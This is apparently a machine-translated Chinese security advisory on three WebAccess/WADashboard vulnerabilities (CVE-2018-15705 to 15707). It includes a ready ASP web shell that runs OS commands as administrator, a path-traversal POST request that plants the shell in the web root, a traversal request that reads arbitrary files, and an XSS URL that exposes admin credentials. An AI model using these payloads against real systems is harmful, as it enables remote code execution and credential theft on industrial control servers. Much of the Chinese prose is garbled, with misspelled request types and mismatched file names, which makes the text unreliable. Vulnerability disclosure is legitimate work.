可租地发现多脆弱点
CVE-2018-15705WADashboardAPI认证目录轨迹
目录遍历可远程开发脆弱文件写或覆盖文件系统验证成功开发低特权用户使用
经典ASP网络应用与API并存后,攻击者可写ASP脚本并随后无认证启动这些脚本请注意API进程WADashboard.exe使用管理员OS权限表示文件可写到磁盘上几乎所有目录
具体地说,脆弱性存在的原因是处理HTTPPPOT请求中“/WADashboard/api/dashboard/v1/file/writeFile”中的参数时缺少输入验证sg参数设计值攻击者可以在C:\Inetpub\wwwroot\broadweb目录中创建aSP脚本远程执行代码
IIS网应用由Broadwebpool应用池组成程序池指定进程标识'应用坡度'表示攻击者ASP代码默认使用这些特权webdobj.webdraw类可即时处理,使攻击者访问RemoteWinExec函数通过使用ASP代码中的函数,攻击者可用管理员权限执行OS命令
下图ASP代码可写入文件以方便命令执行
<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Executed command..."%>
HTTPPST请求利用目录遍历并写ASP代码为exec.asp将写到C:\Inetpub/wwwroot/broadweb/
POST /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=%3c%25%20%53%65%74%20%74%3d%53%65%72%76%65%72%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%77%65%62%64%6f%62%6a%2e%77%65%62%64%72%61%77%22%29%3a%74%2e%52%65%6d%6f%74%65%57%69%6e%45%78%65%63%20%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%70%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%6e%22%29%2c%52%65%71%75%65%73%74%2e%51%75%65%72%79%53%74%72%69%6e%67%28%22%63%22%29%3a%52%65%73%70%6f%6e%73%65%2e%57%72%69%74%65%20%22%45%78%65%63%75%74%65%64%20%63%6f%6d%6d%61%6e%64%2e%2e%2e%22%25%3e&overwrite=true HTTP/1.1
exec.asp写后,攻击者可修改下链路执行他/她选择命令请注意参数值“p”和“n”必须有效可使用枚举法判定
http://192.168.1.194/broadweb/exec.asp?p=myproject&n=mynode&c=calc.exe
CVE-2018-15706WADashboardAPI验证目录轨迹
目录遍历法可远程利用漏洞读取文件系统任意文件但它确实需要认证可使用WebAcess账号实现此功能并有权限限制(非电源用户)。请注意API进程WADashboard.exe使用管理员OS权限表示几乎所有文件都可读取
弱点存在是因为处理HTTPGet请求的'file'参数时缺少输入验证'/WADashboard/api/dashboard/v1/file/readFile'攻击者通过描述编译的“filepath”值可读取文件系统上的任何文件
HTTP请求编译C:\Windows\win.ini记下项目名 MyProject
GET /WADashboard/api/dashboard/v1/files/readFile?projectSpecies=myproject!savedDashboard&filepath=../../../../../../../windows/win.ini&_=1540926323132 HTTP/1.1
相应的JSON响应机构如下
{"resStatus":"0","resString":"!for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1"}
CVE-2018-15707:Bwmaleft.asp用户证书发布
广网/bwmalift.asp中存在反射跨站脚本脆弱性,因为GET参数未经适当验证或净化活动会话证书写入HTML源码并可由客户端JavaScript访问
数个区 原值pname写入页面JavaScript块需要特别关注下方代码片段mainLeft.asp记下使用aSP直接写入页面的用户名和密码
… snip … pname = Request.QueryString("pname") … snip … username = session("UserName") 'get the password if admin if username = "admin" then sql = "SELECT * FROM pUserPassword WHERE UserName='" + username + "'" else sql = "SELECT * FROM pAdmin WHERE UserName='" + username + "'" end if dbTab.open sql,cfgConn,3,2,1 'get the password from database based on the user name, note that only admin can actually log into dashboard here if not dbTab.eof then set tWAObj = Server.CreateObject("webdobj.webdraw") GetUserPwdField dbTab, tWAObj, UsrArr 'get the password from db pwd = UsrArr(0) %>片段
下方证明概念URL
http://192.168.1.194/broadweb/bwmainleft.asp?pid=1&pname=%22);alert(document.getElementsByTagName(%27script%27)[4].text);//
深入解析,跨站脚本脆弱度可用提取用户名和密码值攻击者可用此技术窃取证书下截图用户名为admin密码为scooby